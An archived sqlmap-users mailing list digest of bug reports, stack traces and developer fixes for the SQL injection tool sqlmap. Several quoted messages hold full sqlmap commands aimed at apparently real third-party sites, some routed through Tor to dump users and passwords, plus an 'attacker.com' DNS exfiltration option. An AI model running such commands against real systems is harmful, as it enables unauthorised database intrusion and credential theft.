> >     >         >     >     Accept-Encoding: gzip, deflate
> >     >         >     >     Referer: <Referer>
> >     >         >     >     Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >     >         >     >     Connection: keep-alive
> >     >         >     >     Content-Type: application/x-www-form-urlencoded
> >     >         >     >     Content-Length: 67
> >     >         >     >
> >     >         >     >     <abunchofpostparams>
> >     >         >     >
> >     >         >     >
> >     >         >     >     No hints that cookie-file is not in correct
> format (I've been through this,
> >     >         >     >     at least I think I so ;) ).
> >     >         >     >
> >     >         >     >     Any insight would be much appreciated.
> >     >         >     >
> >     >         >     >
> >     >         >     >     Cheers,
> >     >         >     >
> >     >         >     >     Dirk
> >     >         >     >
> >     >         >     >
> >     >         >     >
> ------------------------------------------------------------------------------
> >     >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >     >         >     >     analytics on semi-structured data. The
> platform includes APIs for building
> >     >         >     >     apps and a phenomenal toolset for data
> science. Developers can use
> >     >         >     >     our toolset for easy data analysis &
> visualization. Get a free account!
> >     >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >     >         >     >     _______________________________________________
> >     >         >     >     sqlmap-users mailing list
> >     >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>>
> >     >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >     >         >     >
> >     >         >     >
> >     >         >     >
> >     >         >     >
> >     >         >     > --
> >     >         >     > Miroslav Stampar
> >     >         >     > http://about.me/stamparm
> >     >         >
> >     >         >
> >     >         >
> >     >         >
> >     >         > --
> >     >         > Miroslav Stampar
> >     >         > http://about.me/stamparm
> >     >
> >     >
> >     >
> >     >
> >     >     --
> >     >     Miroslav Stampar
> >     >     http://about.me/stamparm
> >     >
> >     >
> >     >
> >     >
> >     > --
> >     > Miroslav Stampar
> >     > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> ------------------------------
>
> Message: 6
> Date: Mon, 15 Apr 2013 14:01:01 -0700
> From: <co...@5i...>
> Subject: [sqlmap-users] --host parameter
> To: sql...@li...
> Message-ID:
> <
> 201...@em...
> >
>
> Content-Type: text/plain; charset="utf-8"
>
> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
>
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:57:15
>
> [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>
>
> ....
>
>
> this doesn't work as expected:
>
>  ./sqlmap.py --host='i.csland.ro'
> --url='http://188.240.236.15/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to
> quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>
> Thanks.
>
>
>
>
> ------------------------------
>
> Message: 7
> Date: Tue, 16 Apr 2013 09:12:05 +1100
> From: ???????? ?????? <vo...@s2...>
> Subject: [sqlmap-users] Sqlmap and direct connect error
> To: sql...@li...
> Message-ID: <C59...@s2...>
> Content-Type: text/plain; charset=us-ascii
>
> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> --exclude-sysdbs
>
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -d
> **************************************************** -u
> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 87, in main
>     start()
>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> start
>     action()
>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>     setHandler()
>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> setHandler
>     conf.dbmsConnector.connect()
>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
> connect
>     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> passwd=self.password, db=self.db, port=self.port,
> connect_timeout=conf.timeout, use_unicode=True)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> line 93, in Connect
>     return Connection(*args, **kwargs)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 584, in __init__
>     self._connect()
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 739, in _connect
>     sock.connect((self.host, self.port))
>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> connect
>     raise GeneralProxyError((5, _generalerrors[5]))
> GeneralProxyError: (5, 'bad input')
>
>
>
>
> ------------------------------
>
> Message: 8
> Date: Tue, 16 Apr 2013 14:19:18 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --host parameter
> To: co...@5i...
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> Thank you for your report and find it fixed with the latest commit [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>
>
> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>
> > Hello,
> > the --host doesn't work as expected, or I am doing something wrong:
> >
> >
> > this works as expected:
> >
> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
> >
> >     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> > takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility to
> > obey all applicable local, state and federal laws. Developers assume no
> > liability and are not responsible for any misuse or damage caused by
> > this program
> >
> > [*] starting at 23:57:15
> >
> > [23:57:15] [INFO] testing connection to the target URL
> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> > [23:57:15] [INFO] testing if the target URL is stable. This can take a
> > couple of seconds
> > [23:57:16] [INFO] target URL is stable
> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> > [23:57:16] [INFO] GET parameter 'id' is dynamic
> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> > might be injectable (possible DBMS: 'MySQL')
> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
> >
> >
> > ....
> >
> >
> > this doesn't work as expected:
> >
> >  ./sqlmap.py --host='i.csland.ro'
> > --url='http://188.240.236.15/index.php?id=0'
> >
> >     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> > takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility to
> > obey all applicable local, state and federal laws. Developers assume no
> > liability and are not responsible for any misuse or damage caused by
> > this program
> >
> > [*] starting at 23:58:03
> >
> > [23:58:03] [INFO] testing connection to the target URL
> > [23:58:03] [CRITICAL] page not found (404)
> > it is not recommended to continue in this kind of cases. Do you want to
> > quit and make sure that everything is set up properly? [Y/n]
> > [23:58:05] [WARNING] HTTP error codes detected during run:
> >
> > ............
> >
> >
> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
> >
> > Thanks.
> >
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 9
> Date: Tue, 16 Apr 2013 14:33:33 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
> To: ???????? ?????? <vo...@s2...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
> Content-Type: text/plain; charset="koi8-r"
>
> Hi Vladimir.
>
> Find it "patched" with the latest commit [1]. Basically, those combinations
> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
> added new option validation checks for this kind of cases.
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>
>
> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>
> > Hi!
> >
> > This bug detected if add direct param.
> >
> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> > --exclude-sysdbs
> >
> >
> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
> retry
> > your run with the latest development version from the GitHub repository.
> If
> > the exception persists, please send by e-mail to '
> > sql...@li...' or open a new issue at '
> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> > text and any information required to reproduce the bug. The developers
> will
> > try to reproduce the bug, fix it accordingly and get back to you.
> > sqlmap version: 1.0-dev-de99717
> > Python version: 2.7.3
> > Operating system: posix
> > Command line: sqlmap.py -d
> > **************************************************** -u
> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> > --exclude-sysdbs
> > Technique: None
> > Back-end DBMS: MySQL (identified)
> > Traceback (most recent call last):
> >   File "sqlmap.py", line 87, in main
> >     start()
> >   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> > start
> >     action()
> >   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in
> action
> >     setHandler()
> >   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> > setHandler
> >     conf.dbmsConnector.connect()
> >   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38,
> in
> > connect
> >     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> > passwd=self.password, db=self.db, port=self.port,
> > connect_timeout=conf.timeout, use_unicode=True)
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> > line 93, in Connect
> >     return Connection(*args, **kwargs)
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> > line 584, in __init__
> >     self._connect()
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> > line 739, in _connect
> >     sock.connect((self.host, self.port))
> >   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> > connect
> >     raise GeneralProxyError((5, _generalerrors[5]))
> > GeneralProxyError: (5, 'bad input')
> >
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 10
> Date: Tue, 16 Apr 2013 23:26:39 +0200
> From: buawig <bu...@gm...>
> Subject: [sqlmap-users] feature request: offline mode for
> --dns-domain?
> To: SqlMap List <sql...@li...>
> Message-ID: <516...@gm...>
> Content-Type: text/plain; charset=UTF-8
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> Hi,
>
> in cases where sqlmap is run against targets on internal networks it
> would be great if one could tell sqlmap to simply proceed without
> expecting incoming DNS requests, because sqlmap can not be executed
> directly on the DNS server (which can't reach the target, but the
> target can reach the DNS server).
>
> For me it would be enough to simply run something like
> - -u ... --dns-domain=attacker.com --dns-port=0
> (--dns-port does not exist [yet])
>
> to let sqlmap know that it doesn't need to start a DNS listener.
>
> I would then collect and decode the DNS querries on the DNS server
> manually, but I could also envision runni...
 
[truncated message content]

Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1

[Miroslav S. <mir...@gm...>]

Hi.

This should be "patched" now.

Bye


On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:

> Hi friend,
>
>
>    Could you help me with this bug ?
>
>
> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
> run with the latest development version from the GitHub repository. If the
> exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ***********************************************
> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
> SQL Server --users --passwords
> Technique: BOOLEAN
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
> File "./sqlmap", line 87, in main
> start()
> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
> action()
> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
> conf.dbmsHandler.getPasswordHashes(), "password hash",
> CONTENT_TYPE.PASSWORDS)
> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
> getPasswordHashes
> if user in retrievedUsers:
> TypeError: unhashable type: 'list'
>
> [*] shutting down at 22:54:12
> Thanks
>
> BOB
>
>
>
>
> ------------------ Original ------------------
> *From: * "sqlmap-users-request"<sql...@li...
> >;
> *Date: * May 29, 2013
> *To: * "sqlmap-users"<sql...@li...>;
> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>
> Send sqlmap-users mailing list submissions to
> sql...@li...
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> or, via email, send a message with subject or body 'help' to
> sql...@li...
>
> You can reach the person managing the list at
> sql...@li...
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of sqlmap-users digest..."
>
>
> Today's Topics:
>
>    1. Re: Feature request (David Guimaraes)
>    2. Re: --load-cookies (Dirk Wetter)
>    3. Re: --load-cookies (Miroslav Stampar)
>    4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>       (Miroslav Stampar)
>    5. Re: --load-cookies (Dirk Wetter)
>    6. --host parameter (co...@5i...)
>    7. Sqlmap and direct connect error (???????? ??????)
>    8. Re: --host parameter (Miroslav Stampar)
>    9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>   10. feature request: offline mode for --dns-domain? (buawig)
>   11. feature request: --dns-domain for non-root users (--dns-port)
>       (buawig)
>   12. Domain credentials (Brian Milliron)
>   13. Re: Domain credentials (Brandon Perry)
>   14. Re: feature request: offline mode for --dns-domain?
>       (Miroslav Stampar)
>   15. Re: Domain credentials (Miroslav Stampar)
>   16. Re: feature request: fetch DNS queries from DNS server via
>       HTTP (buawig)
>   17. Re: feature request: fetch DNS queries from DNS server via
>       HTTP (Miroslav Stampar)
>   18. MySQL error based technique bug (Konrads Smelkovs)
>   19. Re: MySQL error based technique bug (Miroslav Stampar)
>   20. SQLmap crashing (Phillip Wylie)
>   21. Re: SQLmap crashing (Miroslav Stampar)
>   22. Custom injection payload in POST (Marcell Fodor)
>   23. Re: SQLmap crashing (Miroslav Stampar)
>   24. I got error on windows (warezhacking)
>   25. Appending to a dump (Stephen Shkardoon)
>   26. Re: Appending to a dump (Miroslav Stampar)
>   27. Re: Appending to a dump (Stephen Shkardoon)
>   28. Re: Appending to a dump (Miroslav Stampar)
>   29. --ignore-404 ? (buawig)
>   30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (buawig)
>   31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (Miroslav Stampar)
>   32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (Miroslav Stampar)
>   33. Re: --ignore-404 ? (Miroslav Stampar)
>   34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>   35. Re: BUG...!!!! o.O (Miroslav Stampar)
>   36. gun...@gm... wants to follow you. Accept?
>       (gun...@gm...)
>   37. Direct access to mysql database (Marcell Fodor)
>   38. Re: Direct access to mysql database (Miroslav Stampar)
>   39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>       (Badoo)
>   40. Not getting any sensitive data from database (Marcell Fodor)
>   41. Re: Not getting any sensitive data from database
>       (Miroslav Stampar)
>   42. unhandled exception (kvasilopoulos)
>   43. [SQLMAP] Unhandled exception for IPv6
>       (e.n...@st...)
>   44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>   45. Re: unhandled exception (Miroslav Stampar)
>   46. Passing SOAPAction in --header (Brandon Perry)
>   47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>   48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>   49. Blind SQL Injection question (Guy Dufour)
>   50. Re: Blind SQL Injection question (Chris Oakley)
>   51. Re: Passing SOAPAction in --header (Brandon Perry)
>   52. Re: Passing SOAPAction in --header (Brandon Perry)
>   53. Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Alok Kumar)
>   54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Brandon Perry)
>   55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Alok Kumar)
>   56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Brandon Perry)
>   57. SQLMAP Bug (Joe O'Hara)
>   58. Re: SQLMAP Bug (Miroslav Stampar)
>   59. [CRITICAL] (Thai Thao)
>   60. Re: [CRITICAL] (Miroslav Stampar)
>   61. Providing multiple dbms (Sebastian Nerz)
>   62. Re: Providing multiple dbms (Miroslav Stampar)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 13 Apr 2013 21:40:39 -0300
> From: David Guimaraes <sk...@gm...>
> Subject: Re: [sqlmap-users] Feature request
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CAJ...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Good question Miroslav.. I tried to think in something that can be
> implemented without ruin sqlmap query schema, but I could not come to any
> conclusion... =(
>
> The thing is, sqlsus use a different approch to dump the data, making this
> kind of thing possible...
>
> The solution that I found in this particular scenario is to use sqlsus,
> unfortunately...
>
> Regards.
>
> David
>
>
> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
> mir...@gm...
> > wrote:
>
> > Hi David.
> >
> > And what do you recommend to be done in case of query with length >
> > max_inj_length?
> >
> > Kind regards,
> > Miroslav Stampar
> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
> >
> >> Hi, I am trying to perform sql injection on a web site but I can not get
> >> successful due to a size limitation on the query sent to the server. The
> >> server is limiting the size of query in 512 bytes only and sqlmap do not
> >> have any customization that allows me to bypass this restriction like
> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
> "autoconf"
> >> that measure the permited query size.
> >>
> >> There is some chance to put this kind of feature in sqlmap?
> >>
> >> Thanks.
> >>
> >> --
> >> David Gomes Guimar?es
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> Own the Future-Intel&reg; Level Up Game Demo Contest 2013
> >> Rise to greatness in Intel's independent game demo contest.
> >> Compete for recognition, cash, and the chance to get your game
> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
>
>
> --
> David Gomes Guimar?es
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 2
> Date: Mon, 15 Apr 2013 11:36:37 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized"
> now. Could you please retry it now?
>
> thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...>> wrote:
> >
> >     Hi Dirk.
> >
> >     Well, I would say that you have an expired cookie. Do you see that
> value 0? That value should be a valid UNIX time representing time of cookie
> expiration. Also, I've just tested that cookie of yours and sqlmap says:
> "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> D=2781203&MS=2781203&AF=NOFORM
> .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com       TRUE    /       FALSE   1429089794      MUID
> 333995A69E06630B2EB491169F016314
> .bing.com       TRUE    /       FALSE   0       _SS
> SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com       TRUE    /       FALSE   0       _HOP
> .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix
> time instead of 0 in there.
>
> Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> >     Kind regards,
> >     Miroslav Stampar
> >
> >
> >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >         Hi Miroslav,
> >
> >         thx for your prompt answer.
> >
> >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >         > Hi Dirk.
> >         >
> >         > Could you please get the latest revision and retry it again?
> >         ed5599f: almost the same: with cookie in the header sqlmap takes
> only this one.
> >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> the server anymore.
> >         >
> >         > There was a situation where info messages have been wrongly
> written that original response contained Set-Cookie in situations like
> yours.
> >         >
> >         > In case that everything stays as it is, I'll need to ask you
> to provide more details. For example, cookie file would be great.
> >
> >         sure, here you go:
> >
> >         --snip
> >         # Netscape HTTP Cookie File
> >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
> \t  <Cookie>
> >         [..]
> >         --snap
> >
> >         They are all session cookies. For easier reading here I put some
> blanks in the line
> >         above, in "cookie-file" there aren't any though. Cookies were
> generated with
> >         stompy and a shell script (looks he same as with
> >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >
> >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> file ;-)
> >
> >         >
> >         > Also, please make sure that the cookie file contains proper
> cookie(s) - domain name should be the same as a domain of target, cookie
> needs to have a proper valid time, etc.
> >
> >         see above.
> >
> >         Cheers,
> >
> >         Dirk
> >
> >         >
> >         >
> >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >         >
> >         >     Hi Miroslav,
> >         >
> >         >     yes unfortunately.
> >         >
> >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >         >     seems to take the first cookie issued by the server with
> set-cookie (and
> >         >     put's it silently in).
> >         >
> >         >     Cheers,
> >         >
> >         >     Dirk
> >         >
> >         >
> >         >
> >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >         >     > Hi.
> >         >     >
> >         >     > And this is also happening if you are skipping "Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> >         >     >
> >         >     > Kind regards,
> >         >     > Miroslav Stampar
> >         >     >
> >         >     >
> >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >         >     >
> >         >     >
